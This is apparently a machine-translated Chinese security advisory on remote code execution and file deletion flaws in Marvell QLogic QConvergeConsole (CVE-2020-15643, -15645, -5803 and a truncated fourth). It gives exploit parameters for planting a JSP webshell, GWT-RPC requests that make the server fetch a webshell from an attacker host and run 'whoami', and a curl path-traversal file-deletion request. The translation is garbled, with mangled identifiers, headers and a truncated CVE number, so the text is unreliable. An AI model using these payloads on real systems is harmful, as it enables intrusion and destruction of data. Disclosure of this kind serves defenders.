可租制研究发现Marvel QConveConsoleGUI多重漏洞,产生自先前发布和补丁漏洞补丁不全
CVE-2020-15643:保存AsText目录远程代码执行易失
前次修复此脆弱点只检查路径遍历名参数不检查预版
参数化
if验证者远程攻击者指定prePath="QCCAgentInstallers"
,name="webshell.jsp"
并数据=
中,saveAsText方法将在QCCGentInstallers网络应用上下文路径中创建恶意webshell
攻击者然后可以向JSPwebshell发送命令,JSPwebshell运行系统或root账号安全上下文
见概念证明GitHub上.
CVE-2020-1564:setAppFileBytes目录远程代码执行脆弱性
前次修复此脆弱点只检查路径遍历名参数不检查Path前参数
if验证者远程攻击者指定prePath="QCCAgentInstallers"
,name="webshell.jsp"
,iType=4
,数据=
并imode=1
中,集AppFileBytes方法将在QCCGentInstallers网络应用上下文路径中创建恶意webshell
攻击者然后可以向JSPwebshell发送命令,JSPwebshell运行系统或root账号安全上下文
见概念证明Github上
CVE-2020-15645:获取FileFromURL不受限制文件上传远程代码执行脆弱性
前一修复似乎有逻辑错误意图似乎是限制文件下载 URL下载.qlogic.com, 反之则相反(限制下载 URL内含下载.qlogic.com)。
公共同步字符串获取FileurLif (urlString.contains("download.qlogic.com")){troy.warn(“getFileFromURL:似然URL名称跳转操作”)回报[.]
认证远程攻击者可上传恶意JSP文件并按系统或root执行
JSP weshell#2运行网站主机服务JSPweshellroot@host:/tm#python3-m3号指令QCC主机从攻击者主机下载JSPweshell#JSPweshell
HContent-Type文本/xgwt-rpc字符集=UTF-8-Hx-GWT-ermplation:deadbeef-d7+0+7
:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|com.qlogic.qms.hba.gwt.client.GWTTestService|getFileFromURL|java.lang.String/2004016611|Z|http://
:8000/webshell.jsp|1|2|3|4|2|5|6|7|0|' http://
8080/QConvecleConsole/com.qlogic.qms.hba.gwt.Mein/gwttestservice#4
网站#
:8080/QConvergeConsole/webshell.jsp?cmd=whoami
命令:whoami
unt权限系统
CVE-2020-5803:删除AppFile验证路径转换文件删除
删除AppFile方法GWTTestServiceImpl类缺乏用户提供路径前用于文件删除操作的适当验证 。经认证远程攻击者可利用此漏洞删除随机远程文件系统或root
Curl-si-cookie 'JSSSIEID=
'\
HCente-Type文本/xgwt-rpc字符集=UTF8
HXGWT变换:死比夫
7+0+8
:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|com.qlogic.qms.hba.gwt.client.GWTTestService|deleteAppFile|java.lang.String/2004016611|I||../../../../../../../../../
23356788
http://
:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/gwttestservice